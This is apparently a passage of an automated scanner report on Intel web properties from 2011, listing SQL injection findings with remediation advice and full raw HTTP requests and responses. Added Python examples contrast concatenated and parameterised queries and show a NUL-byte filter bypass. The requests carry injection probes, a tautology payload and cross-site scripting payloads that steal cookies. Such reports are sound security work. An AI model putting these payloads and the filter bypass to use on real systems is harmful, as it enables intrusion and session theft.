23.45. http://www.intel.com/technology/turboboost/index.htm

23.46. http://www.intel.com/xmlns/lop

23.47. http://www.json.org/js.html

23.48. http://www.mobileworldcongress.com/

23.49. http://www.youtube.com/ep.swf

24. Content type incorrectly stated

24.1. http://6418dc.r.axf8.net/mr/a.gif

24.2. http://ad.com/

24.3. http://gdata.youtube.com/feeds/api/playlists/698CFFD6A87A1ACB/batch

24.4. http://itcenter.intel.com/sites/sitewide/survey/onsitegeo.js

24.5. http://newsroom.intel.com/favicon.ico

24.6. http://newsroom.intel.com/opensearch.xml

24.7. http://newsroom.intel.com/themes/iprtheme/images/intel-logo.gif

24.8. http://newsroom.intel.com/view-video-short.jspa

24.9. http://onsite2.researchintel.com/engine/icorescript.asp

24.10. http://www.facebook.com/extern/login_status.php

24.11. http://www.freedownloadscenter.com/favicon.ico

24.12. http://www.google.com/buzz/api/button.js

24.13. http://www.intc.com/common/download/download.cfm

24.14. http://www.intc.com/common/mobile/

24.15. http://www.intc.com/releasedetail.cfm

24.16. http://www.intel.com/Assets/en_US/Image/marquees/bg-top-support.png

24.17. http://www.intel.com/Assets/en_US/Image/spotlight/biz-itc-tab.jpg

24.18. http://www.intel.com/sites/sitewide/hat/40recode/js/json.js

24.19. http://www.intel.com/sites/sitewide/survey/onsitegeo.js

24.20. http://www.intel.com/sitewide/js/portal-footer-merged-min.js

24.21. http://www.mobileworldcongress.com/

24.22. http://www.w3.org/1999/XSL/Transform

24.23. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

25. Content type is not specified



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
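
Added illustration (not part of the scanner output): a string-built lookup beside its parameterised form, exercised with the same single-quote / double-quote probe that the issue detail entries below describe. The in-memory SQLite table, its contents, the column names and the table name are constructed for the example; the tracker's real back end is not visible in this report.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample store for the example; the tracker's real back end
    is not visible in the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking_pixel (account TEXT, hits INTEGER)")
    conn.executemany(
        "INSERT INTO tracking_pixel VALUES (?, ?)",
        [("6418DC", 12), ("O'NEIL", 3)],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, account: str) -> list:
    """Vulnerable pattern: the request parameter is pasted into the SQL text,
    so a quote in the value changes the structure of the statement."""
    sql = "SELECT hits FROM tracking_pixel WHERE account = '" + account + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, account: str) -> list:
    """Parameterised form: the statement structure is fixed first and the
    value is bound to the placeholder, so it can only ever be data."""
    return conn.execute(
        "SELECT hits FROM tracking_pixel WHERE account = ?", (account,)
    ).fetchall()


def probe(lookup, conn: sqlite3.Connection, base: str) -> dict:
    """The scanner's differential: send base + ' and then base + '' and
    record which of the two produces a database error."""
    outcome = {}
    for label, suffix in (("single", "'"), ("double", "''")):
        try:
            lookup(conn, base + suffix)
            outcome[label] = "ok"
        except sqlite3.Error as exc:
            outcome[label] = "error: " + str(exc)
    return outcome


def looks_injectable(lookup, conn: sqlite3.Connection, base: str) -> bool:
    """True when the lone quote errors but the doubled quote is accepted,
    i.e. the quote reached the SQL parser as syntax rather than as data."""
    r = probe(lookup, conn, base)
    return r["single"].startswith("error") and r["double"] == "ok"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_unsafe), ("parameterised", lookup_safe)):
        print(name, probe(fn, db, "6418DC"), "injectable:", looks_injectable(fn, db, "6418DC"))
    # Once the differential holds, the same sink yields every row:
    print(lookup_unsafe(db, "x' OR '1'='1"))
```

With the concatenated query the lone quote leaves an unterminated string literal and the doubled quote is swallowed as an escaped quote inside the literal, which is exactly the differential the scanner keys on; the parameterised version returns no rows for both probes and also survives a legitimate value such as O'NEIL, which breaks the concatenated form. The probe is only a heuristic: any component that errors on a stray quote for other reasons (a path router, an XML parser) produces the same signature, which is why the findings below carry Tentative confidence.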



1.1. http://6418dc.r.axf8.net/mr/a.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://6418dc.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=6418DC'&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=6418DC''&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT


1.2. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
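Added illustration of the mechanism described above (not scanner output): a filter written in native code reads the decoded path as a C string and stops at the first 0x00 byte, so the quote that follows %00 never reaches its pattern check, while the managed framework behind it keeps explicit lengths and processes the full value. The filter functions and the token list are hypothetical stand-ins; the sample path is the one from Request 1 below. Note also that in this instance both responses are HTTP 404 from the Omniture collector and differ only in whether the 404 body is present (Content-Length 394 against 0), so the quote differential should be confirmed manually before it is treated as SQL injection rather than as path handling.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Hypothetical blocklist of the kind a signature-based filter applies to a path.
BLOCKED_TOKENS = (b"'", b'"', b"--", b";")

# Path from Request 1 of this finding, as sent on the request line.
REQUEST_PATH = "/b%00'/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562"


def native_view(buf: bytes) -> bytes:
    """What a NUL-terminated C string routine reads from buf: everything up to
    the first 0x00.  ctypes.c_char_p.value applies exactly that rule."""
    return ctypes.c_char_p(buf).value


def filter_native_style(decoded_path: bytes) -> bool:
    """Hypothetical filter that hands the buffer to a C string routine.
    Returns True when the request is allowed through; bytes after 0x00 are
    invisible to it."""
    visible = native_view(decoded_path)
    return not any(tok in visible for tok in BLOCKED_TOKENS)


def filter_length_aware(decoded_path: bytes) -> bool:
    """Corrected filter: an embedded NUL is never legitimate in a URL path, so
    reject it outright, and scan the whole buffer rather than a C-string view."""
    if b"\x00" in decoded_path:
        return False
    return not any(tok in decoded_path for tok in BLOCKED_TOKENS)


def evaluate(raw_path: str) -> dict:
    """Percent-decode the request-line path once, as both the filter and the
    application would, and report what each party sees."""
    decoded = unquote_to_bytes(raw_path)
    return {
        "decoded": decoded,
        "native_filter_sees": native_view(decoded),
        "native_filter_allows": filter_native_style(decoded),
        "fixed_filter_allows": filter_length_aware(decoded),
        # Managed code carries the length with the string, so the quote survives.
        "application_sees_quote": b"'" in decoded,
    }


if __name__ == "__main__":
    for path in (REQUEST_PATH, "/b'/ss/x", "/b/ss/x"):
        print(path, evaluate(path))
```

The decoded path is `/b\x00'/ss/...`; the C-string view ends at `/b`, so the native-style filter finds nothing to block, while the application still receives the quote. The corrected filter treats the NUL itself as the signal and inspects the full length, which is the fix to request from the WAF vendor alongside fixing the sink in the application.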

Request 1

GET /b%00'/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 394
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:11 GMT
Server: Omniture DC/2.0.0
xserver: www605
Content-Length: 0
Content-Type: text/html


1.3. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal%00'/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; 
wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 437
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal%00''/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D